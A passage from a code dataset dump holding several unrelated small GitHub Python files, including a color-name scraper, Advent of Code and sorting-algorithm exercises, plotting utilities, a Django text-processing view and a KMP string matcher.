**print_kwargs)\n","repo_name":"gpelouze/ansi_codes","sub_path":"ansi_codes/ansi_codes.py","file_name":"ansi_codes.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11343193813","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_colors_list() -> list:\n colors = []\n with open(\"colors_base.txt\", 'r') as file:\n lines = file.readlines()\n\n for line in lines:\n colorNameAndRgb = line.split(\"| \")\n color_name = colorNameAndRgb[0]\n rgb_red = colorNameAndRgb[1]\n rgb_green = colorNameAndRgb[2]\n rgb_blue = colorNameAndRgb[3][:-1]\n colors.append([color_name, rgb_red, rgb_green, rgb_blue])\n\n return colors\n\n\ndef parse(url):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 YaBrowser/19.10.2.195 Yowser/2.5 Safari/537.36'}\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.text, \"lxml\")\n return soup.find_all('tr')\n\n\ndef main():\n url = \"https://colorscheme.ru/color-names.html\"\n tr = parse(url)\n tr.pop(0)\n colors = []\n for tag in tr:\n info = tag.find_all('td')\n color_name = str(info[1])[4:-5]\n color_red = str(info[3])[4:-5]\n color_green = str(info[4])[4:-5]\n color_blue = str(info[5])[4:-5]\n colors.append([color_name, color_red, color_green, color_blue])\n print(f\"COLOR {color_name} RED {color_red} GREEN {color_green} BLUE {color_blue}\")\n\n with open(\"colors_base.txt\", 'w') as file:\n for color in colors:\n file.write(f\"{color[0]}| {color[1]}| {color[2]}| {color[3]}\\n\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"polterg3ist/visualizer_RGB","sub_path":"rgb_color_name/color_parse_rgb.py","file_name":"color_parse_rgb.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23805721901","text":"#!/bin/env python3\n\nimport collections\nimport itertools\nimport pprint\n\n\nclass Disc(collections.namedtuple('Disc', ('num', 'positions', 'start'))):\n @property\n def positions_by_time(self):\n return (((x + self.num + self.start) % self.positions)\n for x in itertools.count(start=0))\n\n\ndef solve1(discs):\n position_generators = [disc.positions_by_time for disc in discs]\n for x, positions in enumerate(zip(*position_generators)):\n if all([position == 0 for position in positions]):\n return x\n\n\ndef solve2(discs):\n position_generators = [disc.positions_by_time for disc in discs]\n for x, positions in enumerate(zip(*position_generators)):\n if all([position == 0 for position in positions]):\n return x\n\n\nif __name__ == '__main__':\n\n discs = (\n Disc(1, 5, 2),\n Disc(2, 13, 7),\n Disc(3, 17, 10),\n Disc(4, 3, 2),\n Disc(5, 19, 9),\n Disc(6, 7, 0),\n )\n\n discs_part2 = discs + (Disc(7, 11, 0), )\n\n # discs = (\n # Disc(1, 5, 4),\n # Disc(2, 2, 1),\n # )\n pprint.pprint(solve1(discs))\n pprint.pprint(solve2(discs_part2))\n","repo_name":"bloy/adventofcode","sub_path":"2016/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20140352109","text":"import torch\nfrom sklearn.manifold import TSNE\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport pandas as pd\nimport numpy as np\n\ndef plot_TSNE(features_all, proposals_all, mem, class_labels):\n tsne = TSNE(init='pca', learning_rate='auto') # init='random' and lr=200.0 is default\n\n features_all = torch.cat(features_all, dim=0).cpu()\n proposals_all = torch.cat([b.bbox for b in proposals_all], dim=0)\n mem_data = mem.cpu()\n\n # find index by calculating minimum distance\n dists, indexes = torch.cdist(mem_data, features_all).min(dim=-1)\n # 모델의 출력값을 tsne.fit_transform에 입력하기\n pred_tsne = tsne.fit_transform(features_all)\n mem_data_tsne = pred_tsne[indexes]\n\n plt.cla()\n # plot all data points sampled\n xs = pred_tsne[:, 0]\n ys = pred_tsne[:, 1]\n plt.scatter(xs, ys, c='gray', marker='.')\n # plot all data points memorized\n xs = mem_data_tsne[:, 0]\n ys = mem_data_tsne[:, 1]\n label_names = ['bg', # always index 0\n 'airplane', 'antelope', 'bear', 'bicycle', 'bird',\n 'bus', 'car', 'cattle', 'dog', 'domestic_cat',\n 'elephant', 'fox', 'giant_panda', 'hamster', 'horse',\n 'lion', 'lizard', 'monkey', 'motorcycle', 'rabbit',\n 'red_panda', 'sheep', 'snake', 'squirrel', 'tiger',\n 'train', 'turtle', 'watercraft', 'whale', 'zebra']\n colors = ['black', # always index 0\n 'brown', 'chocolate', 'gold', 'khaki', 'olive',\n 'greenyellow', 'darkolivegreen', 'darkseagreen', 'springgreen', 'r',\n 'darkseagreen', 'cyan', 'deepskyblue', 'skyblue', 'steelblue',\n 'powderblue', 'royalblue', 'navy', 'blue', 'slateblue',\n 'darkslateblue', 'blueviolet', 'thistle', 'magenta', 'deeppink',\n 'hotpink', 'crimson', 'pink', 'lightcoral', 'rosybrown']\n # colors = cm.prism(np.linspace(0, 1, 31))\n for cls, c in enumerate(colors):\n tf_cls = class_labels == cls\n # plt.scatter(xs[tf_cls], ys[tf_cls], label=label_names[cls], c=c, cmap=plt.cm.rainbow, marker='.')\n plt.scatter(xs[tf_cls], ys[tf_cls], label=label_names[cls], c=colors[cls], marker='.')\n plt.legend(loc='upper left', bbox_to_anchor=(1.0, 1.0), fontsize='xx-small')\n # plt.scatter(xs, ys, label=label_names[class_labels], c=class_labels, cmap=plt.cm.get_cmap('rainbow', 31), marker='.')\n # plt.colorbar(ticks=label_names)\n plt.savefig('tsne.png')\n plt.show()\n\ndef plot_histogram(contrib_list, l2_norms_list):\n plt.cla()\n contrib = torch.cat(contrib_list).cpu()\n l2_norms = torch.cat(l2_norms_list).cpu()\n targets_df = pd.DataFrame({'Contrib': contrib,\n 'L2_norm': l2_norms})\n sns.kdeplot(targets_df[\n 'Contrib']) # https://mindscale.kr/course/python-visualization-basic/dist/, https://coding-kindergarten.tistory.com/132\n # sns.ecdfplot(targets_df['contrib'])\n plt.show()\n plt.cla()\n sns.kdeplot(targets_df['L2_norm'])\n # sns.ecdfplot(targets_df['contrib'])\n plt.show()\n\n\ndef contrib_L2_plot(contrib, l2_norms, name, name_contrib):\n plt.cla()\n keep_irrelevant = (torch.softmax(l2_norms, dim=0) > 1 / len(l2_norms))\n plt.scatter(contrib, l2_norms, c=keep_irrelevant, cmap=plt.cm.rainbow, marker='.')\n plt.title(name, fontsize=20)\n #major_ticks_topx = np.linspace(0, 1, 11)\n #minor_ticks_topy = np.linspace(0.6, 2.4, 10)\n #plt.xticks(major_ticks_topx)\n #plt.yticks(minor_ticks_topy)\n plt.xlabel(\"contrib_\" + name_contrib, fontsize=20)\n plt.ylabel(\"l2_norm\", fontsize=20)\n plt.show()\n\n\ndef contrib_L2_plots(contrib_list, l2_norms_list, name):\n contrib = torch.cat(contrib_list).cpu()\n l2_norms = torch.cat(l2_norms_list).cpu()\n contrib_L2_plot(contrib, l2_norms, name, 'all')\n contrib_mean = torch.stack(contrib_list).mean(dim=0).cpu()\n l2_norms_mean = torch.stack(l2_norms_list).mean(dim=0).cpu()\n contrib_L2_plot(contrib_mean, l2_norms_mean, name, 'mean')\n contrib_max = torch.stack(contrib_list).max(dim=0)[0].cpu()\n l2_norms_max = torch.stack(l2_norms_list).max(dim=0)[0].cpu()\n contrib_L2_plot(contrib_max, l2_norms_max, name, 'max')\n","repo_name":"sdroh1027/DiffusionVID","sub_path":"demo/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"26629630097","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef index(request):\n\n return render(request,\"index.html\")\n\ndef ex(request):\n return render(request,\"navigator.html\")\n\n\n\ndef analyze(request):\n djtext=request.POST.get(\"text\",\"default\")\n removepunc=request.POST.get(\"removepunc\",\"off\")\n capfirst = request.POST.get(\"capfirst\", \"off\")\n newlineremover=request.POST.get(\"newlineremover\", \"off\")\n extraspaceremover=request.POST.get(\"extraspaceremover\", \"off\")\n numberremover=request.POST.get(\"numberremover\", \"off\")\n\n\n print(djtext)\n print(removepunc)\n punctuations = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n punctext=\"\"\n params = {}\n if removepunc==\"on\":\n for char in djtext:\n if char not in punctuations:\n punctext=punctext+char\n\n remove_punc={\"purpose\":\"removed punctuations\",\"analyzed_text\":punctext}\n params.update({\"removepunctuations\":remove_punc})\n djtext=punctext\n # return render(request,\"analyze.html\",params)\n if capfirst == \"on\":\n captext=\"\"\n for char in djtext:\n captext = captext + char.capitalize()\n uppercase={\"purpose\": \"changed to uppercase\", \"analyzed_text\": captext}\n params.update( {\"uppercase\":uppercase})\n djtext=captext\n #return render(request, \"analyze.html\", params)\n if newlineremover == \"on\":\n newlinetext=\"\"\n for char in djtext:\n if char!=\"\\n\" and char!=\"\\r\":\n newlinetext = newlinetext + char.capitalize()\n newline_remover={\"purpose\": \"newlineremover\", \"analyzed_text\": newlinetext}\n params.update({\"newlineremover\":newline_remover})\n djtext=newlinetext\n #return render(request, \"analyze.html\", params)\n if extraspaceremover == \"on\":\n extraspacetext=\"\"\n for index,char in enumerate(djtext):\n if not(index==len(djtext)-1):\n if not(djtext[index] ==\" \" and djtext[index+1] == \" \"):\n extraspacetext = extraspacetext + char\n else:\n extraspacetext = extraspacetext + char\n space_remover={\"purpose\":\"spaceremover\",\"analyzed_text\":extraspacetext}\n params.update({\"extraspaceremover\":space_remover})\n djtext=extraspacetext\n #return render(request, \"analyze.html\", params)\n\n if (numberremover == \"on\"):\n numberremovedtext = \"\"\n numbers = '0123456789'\n\n for char in djtext:\n if char not in numbers:\n numberremovedtext = numberremovedtext + char\n\n numberremover={\"purpose\":\"numberremover\",\"analyzed_text\":numberremovedtext}\n\n params.update({\"numberremover\":numberremover})\n djtext = numberremovedtext\n return render(request,\"analyze.html\",params)\n\n\n\n\ndef aboutus(request):\n\n return render(request,\"aboutus.html\")\n\n\ndef contactus(request):\n\n return render(request,\"contactus.html\")\n\n\n\n\n\n\n\n\n","repo_name":"giridhar7889/TextUtilis","sub_path":"textutilis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24673152748","text":"import random\n\n\"\"\"単純ソートのスクリプト\"\"\"\ndef simplesrt(data):\n n = 0\n d = data\n d_num = len(d)\n for i in range(d_num-1):\n d_min = min(d[i:d_num])\n d_mindex = d[i:d_num].index(d_min) + i\n d[d_mindex] = d[i]\n d[i] = d_min\n n += 1\n print(\"単純ソートは{}回演算した\".format(n))\n return d\n\n\"\"\"バブルソートのスクリプト\"\"\"\ndef idou(d,d_index):\n n = 0\n x = d[d_index]\n for ii in range(d_index):\n n += 1\n if d[d_index-(ii+1)] >= x:\n d[d_index-ii] = d[d_index-(ii+1)]\n d[d_index-(ii+1)] = x\n else:\n break\n return n, d\ndef bublesrt(data):\n n = 0\n d = data\n d_num = len(d)\n for d_index in range(d_num):\n n1, d = idou(d,d_index)\n n += n1\n print(\"バブルソートは{}回演算した\".format(n))\n return d\n\n\"\"\"挿入ソートのスクリプト\"\"\"\ndef insrt(d,d_index):\n n = 0\n sub_d = d.copy()\n for i in range(d_index):\n n += 1\n if sub_d[i] > sub_d[d_index]:\n d[i] = sub_d[d_index]\n for ii in range(i,d_index):\n d[ii+1] = sub_d[ii]\n #print(\"break!\")\n break\n else:\n continue\n return n, d\ndef insrtsrt(data):\n n = 0\n d = data\n d_num = len(d)\n for d_index in range(1,d_num):\n n1, d = insrt(d,d_index)\n n += n1\n print(\"挿入ソートは{}回演算した\".format(n))\n return d\n\n\"\"\"クイックソートのスクリプト\"\"\"\ndef i_index(data,index,ref):\n d = data\n d_num = len(d)\n for i in range(index,d_num):\n if d[i] >= ref:\n break\n return i\ndef k_index(data,index,ref):\n d = data\n for k in range(index,-1,-1):\n if d[k] <= ref:\n break\n\n return k\ndef exchange(data,i,k):\n buf = data[i]\n data[i] = data[k]\n data[k] = buf\n return data\ndef quiq(data,i,k,n):\n n1 = n\n d = data\n head = i\n tail = k-1\n ref = d[head]\n while id[k] and head 1:\n n1,d = quiq(d,head,k,n1)\n if tail-k > 1:\n n1,d = quiq(d,k+1,tail+1,n1)\n return n1, d\ndef quiqsrt(data):\n n = 0\n d = data\n d_num = len(d)\n n, d = quiq(d,0,d_num,0)\n print(\"クイックソートは{}回演算した\".format(n))\n return d\n\n\n\"\"\"テスト実行用のスクリプト\"\"\"\nlists = [random.randint(0,100) for i in range(100)]\ns_lists = lists.copy()\nb_lists = lists.copy()\ni_lists = lists.copy()\nq_lists = lists.copy()\nprint(\"初めは{}\".format(lists))\ns_lists = simplesrt(s_lists)\nprint(\"並び変えると{}\".format(s_lists))\nprint(\"初めは{}\".format(b_lists))\nb_lists = bublesrt(b_lists)\nprint(\"並び変えると{}\".format(b_lists))\nprint(\"初めは{}\".format(i_lists))\ni_lists = insrtsrt(i_lists)\nprint(\"並び変えると{}\".format(i_lists))\nprint(\"初めは{}\".format(q_lists))\nq_lists = quiqsrt(q_lists)\nprint(\"並び変えると{}\".format(q_lists))\n","repo_name":"Yakyuudaisuki/algorithm","sub_path":"smplsrt.py","file_name":"smplsrt.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11185850333","text":"import sys\nsys.stdin = open('5189_input.txt')\n\n#\n# def dfs(before, cur, cur_elec, visited):\n# global min_elec\n# cur_elec += arr[before][cur]\n# print(f\"{before} to {cur} , 현재전기소비량 {cur_elec}\")\n#\n# if sum(visited)==N:\n# last = cur_elec + arr[cur][1]\n# if min_elec > last:\n# min_elec = last\n#\n# else:\n# for i in range(1,N+1):\n# if visited[i] == False:\n# visited[i] = True\n# next_loc = i\n# dfs(cur,next_loc,cur_elec,visited)\n#\ndef perm(idx, N):\n global min_elec\n if idx == N:\n cur_elec = 0\n new = [1] + p + [1]\n # print(new)\n for i in range(len(new)-1):\n cur_elec += arr[new[i]][new[i+1]]\n # print(arr[i][i+1])\n if cur_elec < min_elec:\n min_elec = cur_elec\n else:\n for i in range(N):\n if used[i] == 0:\n used[i] = 1\n p[idx] = a[i]\n perm(idx+1, N)\n used[i] = 0\n return\n\n\n\n\nT = int(input())\nfor tc in range(1,T+1):\n N = int(input())\n # 행 : 출발지, 열 : 도착지, arr 값 : 전기 소비량\n arr = [[0]*(N+1)] + [[0]+ list(map(int,input().split())) for _ in range(N)]\n\n min_elec = 1000000\n a = list(range(2, N + 1))\n p = [0] * (N - 1)\n used = [0] * (N - 1)\n perm(0, N - 1)\n\n\n print(f\"#{tc} {min_elec}\")\n\n\n","repo_name":"jisy2718/_algorithm","sub_path":"SWEA/5189_전자카트_완전탐색.py","file_name":"5189_전자카트_완전탐색.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27751569918","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\na, b = map(int, input().split())\r\ntmp = [1] * (int(b ** 0.5) + 1)\r\ntmp[0] = 0\r\ntmp[1] = 0\r\n\r\nfor k in range(2, int(b ** 0.5) + 1):\r\n if tmp[k] == 1:\r\n for i in range(k * 2,int(b ** 0.5) + 1, k):\r\n tmp[i] = 0\r\n\r\ncnt = 0\r\nfor i in range(len(tmp)):\r\n if tmp[i] == 1:\r\n n = 2\r\n while True:\r\n if i**n >= a:\r\n if i**n <= b:\r\n cnt += 1\r\n else:\r\n break\r\n n += 1\r\nprint(cnt)","repo_name":"nube-net/baekjoon-nube-net-gytjdttop-","sub_path":"백준/Gold/1456. 거의 소수/거의 소수.py","file_name":"거의 소수.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36527638242","text":"\"\"\"Python implementataion of KMP\nfrom my blog \nhttps://markwh1te.com/post/kmp/\n\"\"\"\n\n\ndef bruteforce_match(s1: str, s2: str)->int:\n if s1 == None or s2 == None or len(s2) < 1 or len(s1) < len(s2):\n return -1\n i = j = 0\n while i < len(s1) and j < len(s2):\n if s1[i] == s2[j]:\n j = j + 1\n else:\n j = 0\n i = i + 1\n\n if j == len(s2):\n return i - j\n else:\n return -1\n\n\ndef kmp(s1: str, s2: str)->int:\n if s1 == None or s2 == None or len(s2) < 1 or len(s1) < len(s2):\n return -1\n next_arr = find_next(s2)\n i = j = 0\n while i < len(s1) and j < len(s2):\n if s1[i] == s2[j]:\n i = i + 1\n j = j + 1\n else:\n if next_arr[j] == -1:\n i = i + 1\n else:\n j = next_arr[j]\n\n if j == len(s2):\n # return the start index of substring\n return i - j\n else:\n # sadly we donot find it :(\n return -1\n\n\ndef find_next(s: str)->[int]:\n \"\"\"\n input:string\n output:the next array of string\n \"\"\"\n if len(s) == 1:\n return [-1]\n result = [0 for i in range(len(s))]\n result[0] = -1\n result[1] = 0\n i = 2\n cn = 0\n while i < len(result):\n if s[i-1] == s[cn]:\n cn += 1\n result[i] = cn\n elif cn > 0:\n cn = result[cn]\n else:\n result[i+1] = 0\n i = i + 1\n return result\n","repo_name":"M4rkWhite/Gate-of-Babylon","sub_path":"algorithms/acm/kmp.py","file_name":"kmp.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40342026145","text":"import random\n\n# LENGTH = 5\n# START = 0\n# STOP = 100\n#\n# random_list = [random.randint(START, STOP) for i in range(LENGTH)]\n# print(random_list)\n#\n# max_num = 0\n# min_num = random_list[0]\n#\n# for i in random_list:\n# if i > max_num:\n# max_num = i\n# if i < min_num:\n# min_num = i\n#\n# print(f'The max number is: {max_num}')\n# print(f'The min number is: {min_num}')\n# print(f'The index of max number is: {random_list.index(max_num)}')\n# print(f'The index of min number is: {random_list.index(min_num)}')\n# index_max = random_list.index(max_num)\n# index_min = random_list.index(min_num)\n# print(index_max)\n# print(index_min)\n#\n# random_list[index_max], random_list[index_min] = random_list[index_min], random_list[index_max]\n# print(random_list)\n\n# COMMENT FOR ME - WRONG SOLUTION - there are some errors\n\n# =====================================================================================================================\n# Solution from teacher\n\nN = 10\nMIN_ITEM = -800\nMAX_ITEM = 750\narray = [random.randint(MIN_ITEM, MAX_ITEM) for _ in range(N)]\nprint(array)\n\n# version 1\nidx_min = 0\nidx_max = 0\n\nfor i in range(len(array)):\n if array[i] < array[idx_min]:\n idx_min = i\n elif array[i] > array[idx_max]:\n idx_max = i\n\narray[idx_min], array[idx_max] = array[idx_max], array[idx_min]\nprint(array)\n\n# version 2\n\nmin_num = min(array)\nmax_num = max(array)\nidx_min = array.index(min_num)\nidx_max = array.index(max_num)\narray[idx_min], array[idx_max] = array[idx_max], array[idx_min]\nprint(array)\n","repo_name":"ZakirovRail/GB_Python_Faculty","sub_path":"1_quarter/Python_Algos_alexey_petrenko/Lesson_3/HW_3/task_3_change_pos_min_max.py","file_name":"task_3_change_pos_min_max.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118700073","text":"from typing import List\n\n\n# https://leetcode.com/problems/where-will-the-ball-fall/discuss/988576/JavaC%2B%2BPython-Solution-with-Explanation\nclass Solution:\n\n def __init__(self):\n self.grid = []\n self.rows = 0\n self.cols = 0\n\n def findBall(self, grid: List[List[int]]) -> List[int]:\n self.grid = grid\n self.rows = len(grid)\n self.cols = len(grid[0])\n return list(map(self.helper, range(self.cols)))\n\n def helper(self, col):\n curr_col = col\n for row in range(self.rows):\n next_col = curr_col + self.grid[row][curr_col]\n if next_col < 0 or self.cols <= next_col:\n return -1\n if self.grid[row][curr_col] != self.grid[row][next_col]:\n return -1\n curr_col = next_col\n return curr_col\n","repo_name":"cabulous/leetcode","sub_path":"python/1706.py","file_name":"1706.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"361513697","text":"# getting data\r\nlines = []\r\nwith open(\"Day5.txt\", \"r\") as f:\r\n for line in f:\r\n line = line.rstrip(\"\\n\").replace(\" -> \", \",\").split(\",\")\r\n lines.append(line)\r\n\r\n# saving dim of our field matrix\r\nxmax = 0\r\nymax = 0\r\n\r\nfor line in lines:\r\n for i, v in enumerate(line):\r\n v = int(v)\r\n if (i+1) % 2 == 0:\r\n if v > ymax:\r\n ymax = v\r\n else:\r\n if v > xmax:\r\n xmax = v\r\n\r\n# creating field matrix\r\nc1 = 0\r\n\r\nfield = []\r\n\r\nwhile c1 < xmax+1:\r\n field.append([])\r\n c1 += 1\r\nfor row in field:\r\n c2 = 0\r\n while c2 < ymax+1:\r\n row.append(0)\r\n c2 += 1\r\n\r\n# filtering only horizontal/vertical lines\r\nfilter_idx = []\r\nfor i, line in enumerate(lines):\r\n if line[0] == line[2] or line[1] == line[3]:\r\n filter_idx.append(i)\r\n\r\nfiltered_lines = []\r\nfor idx in filter_idx:\r\n filtered_lines.append(lines[idx])\r\n\r\n# creating \"elongated\" lines\r\nelongated_lines = []\r\nfor i, line in enumerate(filtered_lines):\r\n for j, v in enumerate(line):\r\n line[j] = int(v)\r\n elongated_lines.append([])\r\n x1 = line[0]\r\n y1 = line[1]\r\n x2 = line[2]\r\n y2 = line[3]\r\n x_idx = []\r\n y_idx = []\r\n if x1 != x2:\r\n if x1 < x2:\r\n step = 1\r\n else:\r\n step = -1\r\n for n in range(x1, x2+step, step):\r\n x_idx.append(n)\r\n else:\r\n x_idx.append(x1)\r\n\r\n if y1 != y2:\r\n if y1 < y2:\r\n step = 1\r\n else:\r\n step = -1\r\n for n in range(y1, y2+step, step):\r\n y_idx.append(n)\r\n else:\r\n y_idx.append(y1)\r\n elongated_lines[i].append(x_idx)\r\n elongated_lines[i].append(y_idx)\r\n\r\n\r\n\r\n\r\nfor line in elongated_lines:\r\n for x in line[0]:\r\n for y in line[1]:\r\n field[x][y] += 1\r\n\r\n\r\ncount = 0\r\nfor row in field:\r\n for col in row:\r\n if col >= 2:\r\n count += 1\r\n\r\nprint(count)\r\n","repo_name":"MariusWank/AdventOfCode","sub_path":"Day5/Day5Part1.py","file_name":"Day5Part1.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13442607008","text":"di = [0, 0, -1, 1]\ndj = [1, -1, 0, 0]\n\ndef init():\n n, m = map(int, input().split())\n grid = [list(map(int, input().split())) for _ in range(n)]\n horse = [list(map(lambda x: int(x) - 1, input().split())) for _ in range(m)]\n return n, m, grid, horse\n\ndef find_idx(a):\n for i in range(n):\n for j in range(n):\n for k in range(len(chess[i][j])):\n if chess[i][j][k][0] == a:\n return [i, j, k]\n\ndef num_check():\n for i in range(n):\n for j in range(n):\n if len(chess[i][j]) >= 4:\n return True\n return False\n\ndef turn():\n for num in range(m):\n i, j, k = find_idx(num)\n d = chess[i][j][k][1]\n new_i = i + di[d]\n new_j = j + dj[d]\n\n if not(0 <= new_i < n and 0 <= new_j < n) or grid[new_i][new_j] == 2:\n if d == 0:\n d = 1\n elif d == 1:\n d = 0\n elif d == 2:\n d = 3\n elif d == 3:\n d = 2\n\n chess[i][j][k][1] = d\n new_i = i + di[d]\n new_j = j + dj[d]\n if 0 <= new_i < n and 0 <= new_j < n:\n if grid[new_i][new_j] == 0:\n length = len(chess[i][j][k:])\n for _ in range(length):\n chess[new_i][new_j].append(chess[i][j].pop(k))\n elif grid[new_i][new_j] == 1:\n length = len(chess[i][j][k:])\n for _ in range(length):\n chess[new_i][new_j].append(chess[i][j].pop())\n \n if num_check():\n return False\n return True\n\nn, m, grid, horse = init()\nchess = [[[] for _ in range(n)] for _ in range(n)]\nfor idx, h in enumerate(horse):\n i, j, d = h\n chess[i][j].append([idx, d])\n\nfor i in range(1000):\n flag = turn()\n if not flag:\n break\nif i < 999:\n print(i + 1)\nelse:\n print(-1)","repo_name":"dhleekr/algorithm","sub_path":"22/17837.py","file_name":"17837.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6588444056","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 19 18:16:15 2019\n\n@author: Vincent Henric & Antoine Lepeltier\n\"\"\"\n\nimport utils\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef mle(X, y):\n n = len(y)\n mu1 = (X[y==1].sum(axis=0))/(y.sum())\n mu0 = (X[y!=1].sum(axis=0))/(n - y.sum())\n sigma1 = ((X[y==1]-mu1).T @ (X[y==1]-mu1))/(y.sum())\n sigma0 = ((X[y!=1]-mu0).T @ (X[y!=1]-mu0))/(n - y.sum())\n pi = y.sum()/n\n return mu0, mu1, sigma0, sigma1, pi\n\ndef linear_coef(mu0, mu1, sigma0, sigma1, pi):\n sigma0_inv = np.linalg.inv(sigma0)\n sigma1_inv = np.linalg.inv(sigma1)\n \n alpha = sigma0_inv - sigma1_inv\n beta = mu1.T @ sigma1_inv - mu0.T @ sigma0_inv\n \n a = 0.5 * alpha[0,0]\n b = 0.5 * alpha[0,1]\n c = 0.5 * alpha[1,1]\n d = beta[0]\n e = beta[1]\n f = utils.logit(pi) + 0.5 * np.log(np.linalg.det(sigma0) / np.linalg.det(sigma1)) - 0.5 * mu1.T @ sigma1_inv @ mu1 + 0.5 * mu0.T @ sigma0_inv @ mu0\n \n return a, b, c, d, e, f\n\ndef log_odds(x, mu0, mu1, sigma0, sigma1, pi):\n sigma0_inv = np.linalg.inv(sigma0)\n sigma1_inv = np.linalg.inv(sigma1)\n return utils.logit(pi) + 0.5 * np.log(np.linalg.det(sigma0) / np.linalg.det(sigma1)) - 0.5 * (x-mu1).T@sigma1_inv@(x-mu1) + 0.5 * (x-mu0).T@sigma0_inv@(x-mu0)\n\ndef proba_func(x, mu0, mu1, sigma0, sigma1, pi):\n exponent = -1 * log_odds(x, mu0, mu1, sigma0, sigma1, pi)\n return 1/(1+np.exp(exponent))\n\ndef predict(x, mu0, mu1, sigma0, sigma1, pi):\n return log_odds(x, mu0, mu1, sigma0, sigma1, pi)>=0\n\ndef conics(x, y, coefs):\n return coefs['a']*x*x + 2*coefs['b']*x*y + coefs['c']*y*y + coefs['d']*x + coefs['e']*y + coefs['f']\n\ndef plot_boundary(X, y, coefs, title='', colormap = False, save = False):\n x_min, x_max = np.min(X[:,0]), np.max(X[:,0])\n y_min, y_max = np.min(X[:,1]), np.max(X[:,1])\n offset = 1\n \n q = 500\n tx = np.linspace(x_min - offset, x_max + offset, num=q) \n ty = np.linspace(y_min - offset, y_max + offset, num=q) \n X_mesh, Y_mesh = np.meshgrid(tx, ty)\n Z = conics(X_mesh, Y_mesh, coefs)\n \n plt.figure(figsize = (9, 9))\n if colormap:\n plt.clf\n plt.imshow(Z, origin=\"lower\", extent=[x_min - offset, x_max + offset, y_min - offset, y_max + offset], aspect = (x_max - x_min)/(y_max - y_min))\n contours = plt.contour(X_mesh, Y_mesh, Z, levels=0, colors='g')\n contours.collections[0].set_label('Decision boundary')\n plt.scatter(X[y == 0,0], X[y == 0,1], label = 'class 0')\n plt.scatter(X[y == 1,0], X[y == 1,1], label = 'class 1')\n\n plt.xlim(x_min - offset, x_max + offset)\n plt.ylim(y_min - offset, y_max + offset)\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.title(title)\n plt.legend(loc=\"upper right\", fontsize=16)\n if save:\n print(\"Save figure results folder.\")\n plt.savefig('results/{}'.format(utils.sanitize(title)))\n plt.show()","repo_name":"VincentHenric/PGM_homework_1","sub_path":"QDA.py","file_name":"QDA.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69813102634","text":"\n\ndef solution(L):\n floor= len(L)\n dp= [[-1e9]*len(L) for _ in range(len(L))]\n for r in range(floor):\n c, val= L[r]\n dp[r][c]=val\n\n [print(*el) for el in dp]\n def topdown(r,c):\n print(r,c)\n if dp[r][c]!=-1e9:\n return dp[r][c]\n if r==c:\n dp[r][c]= topdown(r-1,c-1)-topdown(r,c-1)\n return dp[r][c]\n else:\n dp[r][c]= topdown(r-1,c)-topdown(r,c+1)\n return dp[r][c]\n \n\n for i in range(len(L)):\n for j in range(i+1):\n topdown(i,j)\n\n ans=[]\n for i in range(len(L)):\n for j in range(i+1):\n\n ans.append(dp[i][j])\n\n return ans\n\n\n\n\nprint(solution([[0,50], [0,22], [1,4], [3,33]]))","repo_name":"JannaKim/PS","sub_path":"dp/Gia.py","file_name":"Gia.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12408675913","text":"from abc import ABC, abstractmethod\nfrom time import perf_counter\n\nfrom environment.static_env import StaticEnv\nfrom environment.dynamic_env import DynamicEnv\nfrom utils.utils import DotDict, create_dot_dict\n\n\nclass TimeOutException(Exception):\n def __init__(self, message):\n super(TimeOutException, self).__init__(message)\n\n\nclass AbstractPlanner(ABC):\n\n def plan(self, env, start, goal, timeout, **kwargs):\n '''\n return an instance of DotDict with:\n 1. solution: a list of waypoints. if there is no solution found, the value is None\n 2. 